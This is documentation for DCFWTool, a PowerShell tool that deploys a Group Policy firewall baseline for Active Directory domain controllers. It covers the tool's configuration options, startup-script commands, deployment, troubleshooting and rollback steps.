Initial minimalistic configuraton file that should be renamed to Set-ADDSFirewallPolicy.json and edited before the Set-ADDSFirewallPolicy.ps1 script is executed - DCFWTool\Set-ADDSFirewallPolicy.Sample.json

Sample configuration file containing all supported configurations options - DCFWTool\Set-ADDSFirewallPolicy.schema.json

Schema file for the JSON configuration files - DCFWTool\RpcNamedPipesFilters.txt

netsh.exe script for creating RPC filters - DCFWTool\PolicyDefinitions\DomainControllerFirewall.admx

GPO template file for custom configuration settings - DCFWTool\PolicyDefinitions\MSS-legacy.admx

GPO template file for MSS (Legacy) settings - DCFWTool\PolicyDefinitions\SecGuide.admx

GPO template file for MS Security Guide settings - DCFWTool\PolicyDefinitions\en-US\DomainControllerFirewall.adml

English localization file for the DomainControllerFirewall.admx template - DCFWTool\PolicyDefinitions\en-US\MSS-legacy.adml

English localization file for the MSS-legacy.admx template - DCFWTool\PolicyDefinitions\en-US\SecGuide.adml

English localization file for the SecGuide.admx template

• DCFWTool\Show-WindowsFirewallLog.ps1

PowerShell script for reading Windows Firewall log files.

Security Standards Compliance

Security Technical Implementation Guide (STIG)

The Security Technical Implementation Guide (STIG) for Microsoft Windows Defender Firewall with Advanced Security was developed and published by Defense Information Systems Agency (DISA) as a tool to improve the security of Department of Defense (DOD) information systems.

Our firewall configuration is compliant with the majority of the STIG requirements out-of-the-box. The configuration file can easily be modified to achieve full compliance. The following table of requirements corresponds to the Version 2, Release 2 of the STIG, published on November 9^th, 2023.

Center for Internet Security (CIS) Benchmark

CIS Benchmarks are created using a consensus review process comprised of a global community of subject matter experts. The process combines real world experience with data-based information to create technology specific guidance to assist users to secure their environments. Consensus participants provide perspective from a diverse set of backgrounds including consulting, software development, audit and compliance, security research, operations, government, and legal.

Our firewall configuration is compliant with the majority of the CIS Microsoft Windows Server 2022 v2.0.0 L1 DC requirements out-of-the-box. The configuration file can easily be modified to achieve full compliance, with one negligible exception.

Microsoft Security Compliance Toolkit

The Security Compliance Toolkit (SCT) is a set of tools that allows enterprise security administrators to download, analyze, test, edit, and store Microsoft-recommended security configuration baselines for Windows and other Microsoft products.

Our firewall configuration is compliant with the majority of the SCT Windows Server 2022 Security Baseline requirements out-of-the-box. The configuration file can easily be modified to achieve full compliance.

Group Policy Object Contents

Firewall Configuration

Based on the configured options in Set-ADDSFirewallPolicy.json configuration file, the GPO will contain Windows Firewall profile settings:

• Log dropped packets
• Log allowed packets
• Log file location
• Maximum log size
• Enable local IPSec rule merge

Inbound Firewall Rules

Based on the configured options in Set-ADDSFirewallPolicy.json configuration file, the GPO will contain set of inbound firewall rules.

Registry Settings

Based on the configured options in Set-ADDSFirewallPolicy.json configuration file, the GPO will contain number of registry settings.
Most of them are managed, which means, once the GPO is not linked to the target, the settings revert back to the default state.
Some of them are unmanaged though and need different approach, when you require reverting back to default.

Administrative Templates

The following ADMX and their respective ADML (in English) are copied to Central Store if it exists:

DomainControllerFirewall.admx

• Contains template for configuration of the following settings:
• NTDS Static Port
  Computer Configuration → Administrative Templates → RPC Static Ports → Domain Controller: Active Directory RPC static port
• Netlogon Static Port
  Computer Configuration → Administrative Templates → RPC Static Ports → Domain Controller: Netlogon static port
• FRS Static Port
  Computer Configuration → Administrative Templates → RPC Static Ports → Domain Controller: File Replication Service (FRS) static port
• mDNS Configuration
  Computer Configuration → Administrative Templates → Network → DNS Client → Turn off Multicast DNS (mDNS) client

MSS-legacy.admx

• Contains template for configuration of all the settings stored in:
  Computer Configuration → Administrative Templates → MSS (Legacy)

SecGuide.admx

• Contains template for configuration of all the settings stored in:
  Computer Configuration → Administrative Templates → MS Security Guide

Startup Script

Startup script is used to configure some of the required settings, that are not easily configurable through Group Policy.
FirewallConfiguration.bat script, is automatically generated, based on the configuration defined in the Set-ADDSFirewallPolicy.json file. If enabled in the .json file, the script will execute the following actions:

• Configure WMI static port
• Installs DFS Management tools, if not already present on the machine
• Configure DFSR static port
• Creates firewall log and sets the permissions on it
• Registers RPC filters, defined in RpcNamedPipesFilters.txt

WMI static port

The script will move the WMI service to a standalone process listening on TCP port 24158 with authentication level set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY.

winmgmt.exe /standalonehost 6

DFSR static port

If the server doesn't have DFS Management tools installed, the script will istall it.

if not exist "%SystemRoot%\system32\dfsrdiag.exe" (
  dism.exe /Online /Enable-Feature /FeatureName:DfsMgmt
)

Next, it will configure the DFSR to use static port.

dfsrdiag.exe StaticRPC /Port:5722

Firewall Log File

Log file is not created by the GPO, ACLs need to be configured through command line.

netsh.exe advfirewall set allprofiles logging filename "%systemroot%\system32\logfiles\firewall\pfirewall.log"

RPC Filters Script

The script will register all RPC filters defined in RpcNamedPipesFilters.txt file, which is located in the same path as the FirewallConfiguration.bat, in the "Startup" folder under the recently created firewall GPO.

netsh.exe -f "\\contoso.com\SysVol\contoso.com\Policies\{37CB7204-5767-4AA7-8E85-D29FEBDFF6D6}\Machine\Scripts\Startup\RpcNamedPipesFilters.txt"

NPS Fix for Downlevel Windows Servers

Windows Server 2016 and 2019

EnableNPS

sc.exe sidtype IAS unrestricted

Sample Startup Script

@ECHO OFF
REM This script is managed by the Set-ADDSFirewallPolicy.ps1 PowerShell script.

echo Move the WMI service to a standalone process listening on TCP port 24158 with authentication level set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY.
winmgmt.exe /standalonehost 6

echo Install the dfsrdiag.exe tool if absent.
if not exist "%SystemRoot%\system32\dfsrdiag.exe" (
    dism.exe /Online /Enable-Feature /FeatureName:DfsMgmt
)

echo Set static RPC port for DFS Replication.
dfsrdiag.exe StaticRPC /Port:5722

echo Create the firewall log file and configure its DACL.
netsh.exe advfirewall set allprofiles logging filename "%systemroot%\system32\logfiles\firewall\pfirewall.log"

echo Register the RPC filters.
netsh.exe -f "%~dp0RpcNamedPipesFilters.txt"

echo Fix the NPS service to work with Windows Firewall on downlevel Windows Server versions.
sc.exe sidtype IAS unrestricted

Configuration

Configuration File

All settings that are used for the deployment by the script need to be stored in the file named Set-ADDSFirewallPolicy.json.
The file does not exist by default and needs to be created by you, before deployment.
To help you with the task, we're providing the 2 following files:

• Set-ADDSFirewallPolicy.Starter.json
• Set-ADDSFirewallPolicy.Sample.json

Set-ADDSFirewallPolicy.Starter.json file contains only the minimum settings required for deployment. It is recommended to rename the file to Set-ADDSFirewallPolicy.json and add any additional settings you want to be configured during the deployment.

Set-ADDSFirewallPolicy.Sample.json contains all possible configuration items, with sample values. It is essential to properly configure all the settings, do not use the samples for production deployment without thorough review and adjustment.

{
  "$schema": "Set-ADDSFirewallPolicy.schema.json",
  "GroupPolicyObjectName": "Domain Controller Firewall",
  "TargetDomain": "contoso.com",
  "GroupPolicyObjectComment": "This GPO is managed by the Set-ADDSFirewallPolicy.ps1 PowerShell script.",
  "LogDroppedPackets": true,
  "LogAllowedPackets": false,
  "LogFilePath": "%systemroot%\\system32\\logfiles\\firewall\\pfirewall.log",
  "LogMaxSizeKilobytes": 128,
  "ClientAddresses": [ "10.220.2.0/24", "10.220.4.0/24", "10.220.5.0/24", "10.220.6.0/24" ],
  "ManagementAddresses": [ "10.220.3.0/24" ],
  "DomainControllerAddresses": [ "10.220.1.0/24" ],
  "NtdsStaticPort": 38901,
  "NetlogonStaticPort": 38902,
  "FrsStaticPort": 38903,
  "DfsrStaticPort": 5722,
  "WmiStaticPort": true,
  "DisableNetbiosBroadcasts": true,
  "DisableLLMNR": true,
  "DisableMDNS": true,
  "BlockManagementFromDomainControllers": false,
  "EnableServiceManagement": true,
  "EnableEventLogManagement": true,
  "EnableScheduledTaskManagement": true,
  "EnableWindowsRemoteManagement": true,
  "EnablePerformanceLogAccess": true,
  "EnableOpenSSHServer": false,
  "EnableRemoteDesktop": true,
  "EnableDiskManagement": true,
  "EnableBackupManagement": true,
  "EnableFirewallManagement": false,
  "EnableComPlusManagement": false,
  "EnableLegacyFileReplication": false,
  "EnableNetbiosNameService": false,
  "EnableNetbiosDatagramService": false,
  "EnableNetbiosSessionService": false,
  "EnableWINS": false,
  "EnableDhcpServer": false,
  "EnableNPS": false,
  "EnableKMS": false,
  "EnableWSUS": false,
  "EnableWDS": false,
  "EnableWebServer": false,
  "EnablePrintSpooler": false,
  "EnableFSRMManagement": false,
  "EnableNetworkProtection": true,
  "BlockWmiCommandExecution": true,
  "EnableRpcFilters": true,
  "EnableLocalIPsecRules": false,
  "CustomRuleFileNames": [
      "CustomRules.BackupAgent.ps1",
      "CustomRules.ManagementAgent.ps1"
   ]
}

TODO: Intellisense support:

The rest of this chapter contains documentation to all the available settings.

GroupPolicyObjectName

The name of the Group Policy Object (GPO) that will be created or updated. Feel free to change it so that it complies with your naming policy.

Type: String
Required: true
Default value: "Domain Controller Firewall"

GroupPolicyObjectComment

The comment text that will be visible on the GPO object.

Type: String
Required: false
Default value: "This GPO is managed by the Set-ADDSFirewallPolicy.ps1 PowerShell script."

TargetDomain

FQDN of the domain in which the Group Policy Object (GPO) will be created or updated. This setting is only useful in multi-domain forests. If not specified, the script will attempt to determine the domain of the current user.

Type: String
Required: false
Default value: null

LogDroppedPackets

Indicates whether the packets dropped by the firewall should be logged.

If true, all dropped packets will be logged into the firewall text log. If false, no packets are logged.

Type: Boolean
Required: false
Default value: false
Recommended value: true
Possible values: true / false

LogAllowedPackets

Indicates whether the packets allowed by the firewall should be logged.

If true, all allowed packets will be logged into the firewall text log. If false, no packets are logged.

Type: Boolean
Required: false
Default value: false
Recommended value: false
Possible values: true / false

LogFilePath

Specifies the path to the log file that will be used to store information about the allowed and/or dropped packets, if logging is enabled.
As all 3 profiles (Domain/Private/Public) are configured identically, single log file is created for all of them, to allow easier search, troubleshooting and ingestion by log collectors.

Startup script

echo Create the firewall log file and configure its DACL.
netsh.exe advfirewall set allprofiles logging filename "%systemroot%\system32\logfiles\firewall\pfirewall.log"

Type: String
Required: false
Default value: %systemroot%\\system32\\logfiles\\firewall\\pfirewall.log

LogMaxSizeKilobytes

Sets the maximum size of the firewall log in kilobytes (KB). The file won't grow beyond this size; when the limit is reached, old log entries are deleted to make room for the newly created ones.

Type: Integer
Required: false
Default value: 128
Recommended value: 32767
Possible values: 1 - 32767

ClientAddresses

List of client IP adresses from which inbound traffic should be allowed.

Possible values: IPv4 address, IPv4 subnet or IPv4 address range, separated by a comma, e.g. "10.220.2.0/24", "10.220.4.0/24", "10.220.5.0/24", "192.168.0.1-192.168.0.10". Supports also "Any" as an input.

Specify IPv4 address, IPv4 subnet or address range of all your clients. Anything what acts as a client from a DC perspective is considered client here, so you should specify all your server and user/client subnets.
Everything that needs to interact with your DCs should be included here, except other DCs and secure endpoints (PAWs) used to manage Domain Controllers or Tier 0.

Type: String[]
Required: false
Default value: [ "Any" ]

ManagementAddresses

List of IP addresses from which inbound management traffic should be allowed.

Possible values: IPv4 address, IPv4 subnet or IPv4 address range, separated by a comma, e.g. "10.220.2.0/24", "10.220.4.0/24", "10.220.5.0/24", "192.168.0.1-192.168.0.10".

Specify IPv4 address, IPv4 subnet or address range of all secure endpoints (PAWs) used to manage Domain Controllers or Tier 0.

Type: String[]
Required: false
Default value: [ "Any" ]

DomainControllerAddresses

List of domain controller IP addresses, between which replication and management traffic will be allowed.

Possible values: IPv4 address, IPv4 subnet or IPv4 address range, separated by a comma, e.g. "10.220.2.0/24", "10.220.4.0/24", "10.220.5.0/24", "192.168.0.1-192.168.0.10".

Specify IPv4 address, IPv4 subnet or address range of all your Domain Controllers in the forest.

Type: String[]
Required: false
Default value: [ "Any" ]

NtdsStaticPort

Static port to be used for inbound Active Directory RPC traffic.

By default, the RPC is using dynamic ports 49152 – 65535. If null, this setting is not managed through GPO. If value is defined, this value will be set as static port for Active Directory RPC traffic. See the How to restrict Active Directory RPC traffic to a specific port article for more information. If set to 0 (zero), the port is set to dynamic. If this is configured, you also need to configure the NetlogonStaticPort value.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
Registry value: TCP/IP Port
Value type: REG_DWORD
Value data: (available port)

Restart the computer for the new setting to become effective.

Type: Integer
Default value: null
Recommended value: 38901
Possible values: null / 0 / 1024 - 49151

NetlogonStaticPort

Description: By default, the RPC is using dynamic ports 49152 – 65535. If null, this setting is not managed through GPO. If value is defined, this value will be set as static port for Active Directory RPC traffic. See the How to restrict Active Directory RPC traffic to a specific port article for more information. If set to 0 (zero), the port is set to dynamic. If this is configured, you also need to configure NtdsStaticPort value.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters
Registry value: DCTcpipPort
Value type: REG_DWORD
Value data: (available port)

Restart the Netlogon service for the new setting to become effective.

Type: Integer
Default value: null
Recommended value: 38902
Possible values: null / 0 / 1024 - 49151

FrsStaticPort

Static port to be used for legacy FRS traffic.

By default, the FSR is using dynamic RPC ports. If null, this setting is not managed through GPO. If value is defined, this value will be set as static port for DFS Replication traffic. If set to 0 (zero), the port is set to dynamic.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTFRS\Parameters
Registry value: RPC TCP/IP Port Assignment
Value type: REG_DWORD
Value data: (available port)

Restart the File Replication service for the new setting to become effective.

Type: Integer
Default value: null
Recommended value: 38903
Possible values: null / 0 / 1024 - 49151

DfsrStaticPort

Static port to be used for DFSR traffic.

By default, the DFSR is using dynamic ports 49152 – 65535. If null, this setting is not managed through GPO. If value is defined, this value will be set as static port for DFS Replication traffic, for more info, see the Configuring DFSR to a Static Port - The rest of the story article. If set to 0 (zero), the port is set to dynamic.

Startup script

1024 - 49151:

echo Install the dfsrdiag.exe tool if absent.
if not exist "%SystemRoot%\system32\dfsrdiag.exe" (
    dism.exe /Online /Enable-Feature /FeatureName:DfsMgmt
)

echo Set static RPC port for DFS Replication.
dfsrdiag.exe StaticRPC /Port:5722

0:

echo Install the dfsrdiag.exe tool if absent.
if not exist "%SystemRoot%\system32\dfsrdiag.exe" (
    dism.exe /Online /Enable-Feature /FeatureName:DfsMgmt
)

echo Set dynamic RPC port for DFS Replication.
dfsrdiag.exe StaticRPC /Port:0

null: not present

Type: Integer
Default value: null
Recommended value: 5722
Possible values: null / 0 / 1024 - 49151

WmiStaticPort

Indicates whether inbound Windows Management Instrumentation (WMI) traffic should use a static port.

By default, the WMI is using dynamic ports 49152 – 65535. If null, this setting is not managed through GPO. If true, WMI will use static port 24158, if false, WMI will use dynamic port. For more info, see the Setting Up a Fixed Port for WMI article.

Startup script

true:

The RPC_C_AUTHN_LEVEL_PKT_PRIVACY setting prevents replay attacks, verifies that none of the data transferred between the client and server has been modified and ensures that the data transferred can only be seen unencrypted by the client and the server.

echo Move the WMI service to a standalone process listening on TCP port 24158 with authentication level set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY.
winmgmt.exe /standalonehost 6

false:

echo Move the WMI service into the shared Svchost process.
winmgmt.exe /sharedhost

null: not present

Type: Boolean
Required: false
Default value: null
Recommended value: true
Possible values: true / false / null

DisableNetbiosBroadcasts

Indicates whether the NetBIOS protocol should be switched to P-node (point-to-point) mode. If true NetBIOS node type is set to P-node. If false NetBIOS node type is set to H-node (hybrid) If null NetBIOS node type is not managed through GPO.

Type: Boolean
Required: false
Default value: null
Recommended value: true
Possible values: true / false / null

DisableLLMNR

Indicates whether the Link-Local Multicast Name Resolution (LLMNR) client should be disabled.

If true, Link Local Multicast Name Resolution (LLMNR) is disabled. If false, LLMNR is enabled. If null LLMNR configuration is not managed through GPO. For more info, please refer to the AZ-WIN-00145 configuration item in the Windows security baseline.

Type: Boolean
Required: false
Default value: false
Recommended value: true
Possible values: true / false

DisableMDNS

Indicates whether the Multicast DNS (mDNS) client should be disabled.

If true, mDNS is disabled. If false, mDNS is enabled. If null, this setting is not managed through GPO. For more info, see the following Microsoft article.

Type: Boolean
Required: false
Default value: null
Recommended value: true
Possible values: true / false / null

BlockManagementFromDomainControllers

Indicates whether management traffic from other domain controllers should be blocked. This setting affects the following firewall rules:

If true... if false...

Type: Boolean
Required: false
Default value: false
Recommended value: true
Possible values: true / false

EnableServiceManagement

Indicates whether remote service management should be enabled.

If true, corresponding ports are open and remote services management will be available. If false, services cannot be managed remotely. The script achieves this by enabling or disabling the Remote Service Management (RPC) firewall rule.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableEventLogManagement

Indicates whether remote event log management should be enabled. If true, the corresponding port is open and remote Event Log management will be available. If false, Event Log cannot be managed remotely. The script achieves this by enabling or disabling the Remote Event Log Management (RPC) firewall rule.

Type: Boolean
Required: false
Default value: true
Recommended value: true
Possible values: true / false

EnableScheduledTaskManagement

Indicates whether remote scheduled task management should be enabled.

If true, corresponding ports are open and remote scheduled tasks management will be available. If false, scheduled tasks cannot be managed remotely. The script achieves this by enabling or disabling the Remote Scheduled Tasks Management (RPC) firewall rule.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableWindowsRemoteManagement

Indicates whether inbound Windows Remote Management (WinRM) traffic should be enabled. This protocol is used by PowerShell Remoting, Server Manager, and PowerShell CIM cmdlets.

If true, corresponding ports are open and WinRM will be available. If false, WinRM ports won’t be open. The script achieves this by enabling or disabling the Windows Remote Management (HTTP-In) and Windows Remote Management (HTTPS-In) firewall rules.

For more info, see the following Microsoft article.

Type: Boolean
Required: false
Default value: true
Recommended value: true
Possible values: true / false

EnablePerformanceLogAccess

Indicates whether remote performance log access should be enabled.

If true, corresponding ports are open and remote Performance Log management will be available. If false, Performance Log cannot be managed remotely. The script achieves this by enabling or disabling the Performance Logs and Alerts (TCP-In) firewall rule.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableOpenSSHServer

Indicates whether inbound OpenSSH traffic should be enabled.

If true, corresponding ports are open and OpenSSH will be available. If false, OpenSSH won't be allowed. The script achieves this by enabling or disabling the OpenSSH SSH Server (sshd) firewall rule.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableRemoteDesktop

Indicates whether inbound Remote Desktop Protocol (RDP) traffic should be enabled.

If true, corresponding ports are open and remote desktop connection (RDP) will be available. If false, RDP is not available. The script achieves this by enabling or disabling the Remote Desktop - User Mode (TCP-In) and Remote Desktop - User Mode (UDP-In) firewall rules.

Type: Boolean
Required: false
Default value: true
Recommended value: true
Possible values: true / false

EnableDiskManagement

Indicates whether remote disk management should be enabled.

If true, corresponding ports are open and remote disk management will be available. If false, disks cannot be managed remotely. The script achieves this by enabling or disabling the Remote Volume Management - Virtual Disk Service Loader (RPC) and Remote Volume Management - Virtual Disk Service (RPC) firewall rules.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableBackupManagement

Indicates whether remote management of Windows Server Backup should be enabled.

If true, corresponding ports are open and remote Windows Backup management will be available. If false, Windows Backup cannot be managed remotely. The script achieves this by enabling or disabling the Windows Backup (RPC) firewall rule.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableFirewallManagement

Indicates whether remote firewall management should be enabled.

If true, corresponding ports are open and remote Windows Defender Firewall management will be available. If false, Windows Defender Firewall cannot be managed remotely. The script achieves this by enabling or disabling the Windows Defender Firewall Remote Management (RPC) firewall rule.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableComPlusManagement

Indicates whether inbound COM+ management traffic should be enabled.

If true, corresponding ports are open and remote DCOM traffic for COM+ System Application management is allowed. If false, COM+ System Application cannot be managed remotely. The script achieves this by enabling or disabling the COM+ Remote Administration (DCOM-In) firewall rule.

For more info, see the following Microsoft article.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableLegacyFileReplication

Indicates whether inbound legacy file replication traffic should be enabled.

If true, corresponding ports are open for NTFRS replication. If you still haven’t migrated your SYSVOL replication to modern DFSR, you need to enable this setting. If false, NTFRS ports won’t be open. The script achieves this by enabling or disabling the File Replication (RPC) firewall rule.

For more info, see the following Microsoft article.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableNetbiosNameService

Indicates whether inbound NetBIOS Name Service should be allowed.

If true, corresponding ports (UDP 137) are open and NetBIOS will be available. If false, NetBIOS ports are not open. The script achieves this by enabling or disabling the File and Printer Sharing (NB-Name-In) firewall rule.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableNetbiosDatagramService

Indicates whether inbound NetBIOS Datagram Service traffic should be allowed.

If true, corresponding ports (UDP 138) are open and NetBIOS will be available. If false, NetBIOS ports are not open. The script achieves this by enabling or disabling the Active Directory Domain Controller - NetBIOS name resolution (UDP-In) firewall rule.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableNetbiosSessionService

Indicates whether inbound NetBIOS Session Service (NBSS) traffic should be allowed.

If true, corresponding ports (TCP 139) are open and NetBIOS will be available. If false, NetBIOS ports are not open. The script achieves this by enabling or disabling the File and Printer Sharing (NB-Session-In) firewall rule.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableWINS

Indicates whether inbound Windows Internet Name Service (WINS) traffic should be allowed.

If true, corresponding ports are open and Windows Internet Naming Service (WINS) will be available. If false, WINS ports are not open. The script achieves this by enabling or disabling the Windows Internet Naming Service (WINS) (TCP-In), Windows Internet Naming Service (WINS) (UDP-In), and Windows Internet Naming Service (WINS) - Remote Management (RPC) firewall rules.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableDhcpServer

Indicates whether inbound Dynamic Host Configuration Protocol (DHCP) server traffic should be allowed.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableNPS

Indicates whether inbound Network Policy Server (NPS) / RADIUS traffic should be allowed.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

RadiusClientAddresses

Type: String[]
Required: false
Default value: [ "Any" ]

EnableKMS

Indicates whether inbound Key Management Service (KMS) traffic should be allowed.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableWSUS

Indicates whether inbound Windows Server Update Services (WSUS) traffic should be allowed.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableWDS

Indicates whether inbound Windows Deployment Services (WDS) traffic should be allowed.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableWebServer

Indicates whether inbound http.sys-based web server traffic on default HTTP and HTTPS ports should be allowed.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableFSRMManagement

Indicates whether inbound File Server Resource Manager (FSRM) management traffic should be allowed.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnablePrintSpooler

Indicates whether inbound Print Spooler traffic through RPC over TCP should be allowed.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

EnableNetworkProtection

Indicates whether the Network protection feature of Microsoft Defender Antivirus should be enabled.

If true MDA Network Protection will be configured in block mode. If false MDA Network Protection will be configured in audit mode only. If null MDA Network Protection will not be configured.

Type: Boolean
Required: false
Default value: null
Recommended value: true
Possible values: true / false / null

BlockWmiCommandExecution

Indicates whether to block process creations originating from PSExec and WMI commands using Defender ASR. This is achieved by enforcing the following Microsoft Defender Antivirus Attack Surface Reduction (ASR) rules:

• Block process creations originating from PSExec and WMI commands
• Block persistence through WMI event subscription

If true MDA Attack Surface Reduction rules (mentioned above) will be configured in block mode. If false MDA Attack Surface Reduction rules (mentioned above) will be configured in audit mode only, allowing you to evaluate the possible impact if the rules were enabled in block mode. If null MDA ASR rules are not configured, effectively disabling the rules.

Type: Boolean
Required: false
Default value: null
Recommended value: true
Possible values: true / false / null

EnableRpcFilters

Indicates whether additional filtering of RPC over Named Pipes should be applied.

If true, RPC filters defined in RpcNamedPipesFilters.txt will be enabled. If false, RPC filters are not enabled. If null this setting is not managed.

Type: Boolean
Required: false
Default value: null
Recommended value: true
Possible values: true / false / null

EnableLocalIPsecRules

Indicates whether local IPSec rules should be enabled. Although no IPSec rules are deployed by this solution, most security baselines require local IPSec rules to be disabled.

If true, local IPSec rules will be enabled. If false, only IPSec rules distributed through GPOs will be allowed.

Type: Boolean
Required: false
Default value: true
Recommended value: false
Possible values: true / false

CustomRuleFileNames

Specifies the name(s) of additional script file(s) containing firewall rules that will be imported into the Group Policy Object (GPO).

There are several practical advantages to keeping customer-specific firewall rules in separate files:

• The main script file can easily be updated without the need to re-apply customer modifications.
• Custom rule scripts can be shared among multiple server roles. As an example, rules enabling communication with a backup agent will probably be the same for domain controller (DC) and certification authority (CA).

See the CustomRules.Sample.ps1 sample file, which can be used as a template.

Type: String[]
Required: false
Default value: null

Deployment

Prerequisites

• Domain Admins group membership or equivalent privileges, enabling the creation of a Group Policy Object (GPO), creation of folders and files in SYSVOL, and linking the GPO to the Domain Controllers OU.
• PowerShell modules that must be installed as part of RSAT:
• GroupPolicy
• ActiveDirectory

Dealing with GPO Tattooing

Some firewall-related settings are not removed from the domain controllers after they fall out of scope of the GPO. These changes are thus permanent and require manual removal. Such settings are called unmanaged and the resulting behavior is known as GPO tattooing. To address this issue, configuration files use ternary logic:

• true ⇒ The setting is enabled by the GPO.
• false ⇒ The setting is disabled by the GPO.
• null ⇒ The local setting is not changed by the GPO.

As a consequence, before the value of an unmanaged setting can be changed from true to null, it must temporarily be set to false. Keep in mind that it may take time for the new settings to propagate to all domain controllers due to replication latency. Additionally, some settings may require a reboot.

The following settings in this project are known to cause tattooing:

• NtdsStaticPort
• NetlogonStaticPort
• FrsStaticPort
• DfsrStaticPort
• WmiStaticPort
• DisableNetbiosBroadcasts
• DisableMDNS
• EnableRpcFilters

System Reboots

Changes to some settings require a reboot of the target domain controller to get applied. This is the case of static port number configurations and settings that are modified through the startup script:

• NtdsStaticPort
• NetlogonStaticPort
• FrsStaticPort
• DfsrStaticPort
• WmiStaticPort
• EnableRpcFilters
• LogFilePath
• EnableNPS

If a full system reboot of all domain controllers is undesirable, the following steps can be performed instead:

1. Make sure that the Group Policy changes are replicated to all domain controllers.
2. Invoke the gpupdate.exe command for the changed policies to be applied immediately.
3. Run the gpscript.exe /startup command for Group Policy startup scripts to be executed immediately.
4. Execute the net.exe stop NTDS && net.exe start NTDS command to restart the AD DS Domain Controller service.
5. Execute the net.exe stop IAS && net.exe start IAS command to restart the Network Policy Server service, if present.
6. Execute the net.exe stop NtFrs && net.exe start NtFrs command to restart the File Replication service, if migration to DFS-R has not been performed yet.
7. Repeat steps 2-6 on all domain controllers.

Installation

Rename Set-ADDSFirewallPolicy.Starter.json to Set-ADDSFirewallPolicy.json.
Review the available configuration items with sample values in Set-ADDSFirewallPolicy.Sample.json and use any, that you want to be configured in your environment.
All the configuration items with their possible values are documented in the Configuration chapter.

Once you are finished with modifying all the required configuration settings in the Set-ADDSFirewallPolicy.json file, it is recommended to review the set of rules that will be deployed by the GPO.

After the review is completed, you can begin with the deployment.

Open Powershell and run the Set-ADDSFirewallPolicy.ps1 script:

You might need to adjust your Powershell execution policy to allow execution of the script:

Script logic:

Creates GPO – the GPO is NOT linked to any OU.

Atomic changes…

Creates startup script FirewallConfiguration.bat (batch file is used to avoid any issues with Powershell execution policy)

If the script has finished without any errors, all required objects should be deployed.

The last step is to link the newly created GPO to Domain Controllers OU.

Before doing that, you should thoroughly review the GPO!

Once done, link the GPO to Domain Controllers OU.

By default, GPO is refreshed every 5 minutes for DCs, so all your DCs should have the firewall configuration applied within maximum of 5 minutes.
Some settings require DC restart to apply, please refer to System Reboots.

Troubleshooting

The following PowerShell script can be used to display the Windows Firewall log file in a human-readable way:

[string] $logFilePath = "$env:SystemRoot\System32\LogFiles\Firewall\pfirewall.log"

[string[]] $columnsToShow = @('date','time','path','action','pid',
    'src-ip','src-port','dst-ip','dst-port','icmptype','icmpcode')

Get-Content -Path $LogFilePath |
    Select-Object -Skip 3 |
    ForEach-Object { $PSItem -replace '^#Fields: ' } |
    ConvertFrom-Csv -Delimiter ' ' |
    Select-Object -Property $columnsToShow |
    Out-GridView -Title 'Windows Firewall Log' -Wait

An improved version of this script is available in the Show-WindowsFirewallLog.ps1 file, which is part of the DCFWTool.

Rollback

As some of the settings are propagated throug startup script and some, even though propagated through GPO, cause tattooing, you first need to reconfigure some settings in the GPO and modify the startup script, let the changes apply on all DCs and only after that, unlink the GPO.

Follow these steps:

1. Change the following settings in the GPO:

• NtdsStaticPort
• NetlogonStaticPort
• FrsStaticPort
• DisableNetbiosBroadcasts
• DisableMDNS

Locate all the above settings in the Firewall GPO and set them to "Not Configured".

2. Change the following settings in the startup script:

• DfsrStaticPort
• WmiStaticPort

Locate and open FirewallConfiguration.bat file, located in the "Startup" folder of the DC firewall GPO (e.g.: C:\Windows\Sysvol\domain\Policies\{03AAF463-967E-46DD-AB7F-DBD4ECC28F63}\Machine\Scripts\Startup):

Change the following line winmgmt.exe /standalonehost 6 ⇒ winmgmt /sharedhost
Change the following line dfsrdiag.exe StaticRPC /Port:5722 ⇒ dfsrdiag staticrpc /port:0

3. Remove the RPC filters

Remove "#" before "exit" at line 15 in RpcNamedPipesFilters.txt, located in the "Startup" folder of the DC firewall GPO (e.g.: C:\Windows\Sysvol\domain\Policies\{03AAF463-967E-46DD-AB7F-DBD4ECC28F63}\Machine\Scripts\Startup):

4. Restart the DCs

Once AD and SYSVOL replication convergence is achieved and all DCs in the environment received the changed GPO, startup script and RPC configuration file, you need to restart all DCs.

5. Unlink the GPO

Once all DCs have been restarted, you unlink the Firewall GPO from the Domain Controllers container in GPO management console.

Inbound Firewall Rules Reference

Microsoft's Guidelines

• How to configure a firewall for Active Directory domains and trusts
• Service overview and network port requirements for Windows

Dynamic RPC ports, listed in the table below, can be set to static port through Configuration File:

• NTDS static port
• Netlogon static port
• FRS static port
• DFSR static port

Additional firewall rules that are not DC-specific might be required to enable core networking functionality and server remote management:

Client Traffic

